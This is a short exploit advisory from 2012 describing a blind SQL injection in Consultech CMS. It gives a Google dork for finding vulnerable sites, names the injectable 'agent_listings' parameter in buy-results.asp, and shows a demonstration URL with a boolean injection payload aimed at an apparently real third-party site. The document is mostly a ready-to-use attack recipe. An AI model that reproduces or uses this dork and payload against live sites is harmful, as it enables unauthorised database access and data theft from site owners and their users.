# Exploit Title: Consultech cms Blind Sql Injection # Google Dork: inurl:buy-results.asp?agent_listings intext:Powered by Consultech # Date: 08/22/2012 # Author: Crim3R # Vendor Home : http://www.consultech.net/ # Tested on: all ==================================    the agent_listings parametr is agent_listings to blind sql injection     http://127.0.0.1/public/buy-results.asp?agent_listings=[id][Bsqli]  D3m0: http://www.homefinder.org/public/buy-results.asp?agent_listings=3830146045 and 2*5=10 ===============Crim3R@Att.Net========= $Home = %00 thanks to :  2MzRp - Mikili - 0x0ptim0us - iC0d3R - farbodmahini & Amir